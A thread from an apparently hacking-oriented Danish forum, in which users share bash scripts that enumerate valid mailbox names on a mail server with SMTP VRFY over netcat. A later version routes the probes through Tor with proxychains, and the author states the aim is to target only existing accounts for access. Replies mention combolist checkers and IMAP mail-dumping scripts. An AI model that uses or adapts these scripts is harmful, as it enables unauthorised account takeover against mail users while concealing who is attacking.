Denne side bruger cookies
Dette forum bruger cookies. Hvis du er registreret, bruges de til at huske hvem du er logget ind som. Hvis ikke, gemmer vi dit sidste besøgstidspunkt. Besøgstidspunktet bruges bl.a. til at holde øje med, hvilke tråde du allerede har læst. Cookies er små tekstdokumenter, som bliver gemt i din browser og udgør ingen sikkerhedsrisiko. Tryk "Mere Information" nedenfor, for en liste over de cookies vi sætter. Du har mulighed for at fravælge cookies ved at klikke på knappen "Blokér Cookies" i bunden af denne boks.

En ikke-personhenførbar cookie vil blive gemt i din browser, uanset dit valg. Således undgår du at blive spurgt igen. Du kan til enhver tid ændre dit valg via linket i bunden af siden.

Tråd bedømmelse:
  • 1 Stemmer - 5 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Test af valide brugere via SMTP og VRFY fra linux bash
18-05-2015, 16:16
#1
Test af valide brugere via SMTP og VRFY fra linux bash
Hvis man har brug for at teste om en bruger har en mailkonto på en given mail server, kan man bruge nedenstående script til at teste om brugeren findes.

Scriptet kaldes med:
Citer:./mailusers.sh users.txt mail.example.com > valid.txt

Filen users.txt har en liste af formodede gyldige brugernavne. Måske er disse gættet, rippet fra en hjemmeside, fundet med TheHarvester, eller lign.

mail.example.com er den mailserver man ønsker at teste op i mod.
Outputtet bliver sendt til filen "valid.txt".

#!/bin/bash
# Kaldes med ./mailusers.sh <userlist> <mailserver> > output.txt

for user in $(cat $1);
do
echo "vrfy $user" | nc -q 2 $2 25 | grep "^252 " | cut -f3 -d" " &
done

mailusers.sh skal selvfølgelig gøres eksekverbar med:
Citer:$ chmod u+x mailusers.sh

Jeg håber nogen kan bruge det. Det er sådan set ret simpelt.
Når scriptet er forbundet til mail serveren med netcat på port 25, udsteder det en "vrfy <brugernavn>".
Hvis brugeren findes, giver mail serveren en returkode "252", hvilket betyder at brugeren findes og hvis brugeren ikke findes, gives en returkode "550".
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-05-2015, 19:08
#2
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Jeg havde egentlig ikke tænkt over at der var en kommando til det. Det giver naturligvis mening, da det betyder, at servere ikke begynder at sende hele e-mailen hvis mailboksen alligevel ikke eksisterer.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-05-2015, 19:37
#3
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 19:08)Doctor Blue Skrev: Jeg havde egentlig ikke tænkt over at der var en kommando til det. Det giver naturligvis mening, da det betyder, at servere ikke begynder at sende hele e-mailen hvis mailboksen alligevel ikke eksisterer.

Ja det er sådan set ret praktisk. Også selv om det kan misbruges.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-05-2015, 21:14
#4
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Ganske smart... har noget pyton kode som gør det samme, men endnu nemmere direkte fra bash..
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-05-2015, 21:18
#5
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 21:14)Spagnum Skrev: Ganske smart... har noget pyton kode som gør det samme, men endnu nemmere direkte fra bash..

Hvis det er noget du vil dele, må du gerne det. Jeg har også nok også en Python udgave, men det ville være rart at se, hvordan andre gør det.
I sær hvis den er simpel. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
18-05-2015, 21:33 (Denne besked var sidst ændret: 19-05-2015, 10:56 af Spagnum.)
#6
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Det er ikke noget jeg selv har kodet, fandt det på nettet engang men skal lige finde det frem ved lejlighed :)

Edit:
Den lå her allerede:
https://shellsec.pw/traad-accountchecker
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
19-05-2015, 15:13 (Denne besked var sidst ændret: 19-05-2015, 15:13 af Doctor Blue.)
#7
RE: Test af valide brugere via SMTP og VRFY fra linux bash
(18-05-2015, 21:33)Spagnum Skrev: Det er ikke noget jeg selv har kodet, fandt det på nettet engang men skal lige finde det frem ved lejlighed :)

Edit:
Den lå her allerede:
https://shellsec.pw/traad-accountchecker

Ah ja, men din tester brugernavn/password kombinationer. iTicks tjekker kun om mailboxen eksisterer :)
Hvis vi er ude i at dele den slags, så har jeg også lavet et par scripts. Det sidste af disse har også threading for at speede det lidt op.
check_email.py (Tjekker kombolister mod et par forskellige free hosts)
dump_email.py (Dumper alle brugerens mails via IMAP)
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
19-05-2015, 15:29 (Denne besked var sidst ændret: 19-05-2015, 15:38 af iTick.)
#8
RE: Test af valide brugere via SMTP og VRFY fra linux bash
Nice. :) You are the master. I bow to you Doctor Blue. :)

Som du siger, så leder mit mini script kun efter gyldige mailboxes.
Så jeg kun bruger tid på at opnå adgang til de konti der rent faktisk eksisterer.

#!/bin/bash
# Af iTick
# Kaldes med ./mailusers.sh <userlist> <server ip> > output.txt

for user in $(cat $1);
do
echo "vrfy $user" | proxychains nc -n -w 4 $2 25 | grep "^252 " | cut -f3 -d" " &
done

Ovenstående er ikke specielt stabil, men den virker gennem Tor.
Den har lidt problemer med DNS opslaget, så jeg valgt, den kun skal virke på IP adressen og tilføjet -n til netcat.
Tor skal selvfølgelig være installeret.

På Kali:
Citer:# apt-get install tor
# service tor start

Og så skal /etc/proxychains.conf sættes til:
Citer:socks4 127.0.0.1 9050

Hvis nogen har en bedre metode, hører jeg gerne jeres idéer.
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)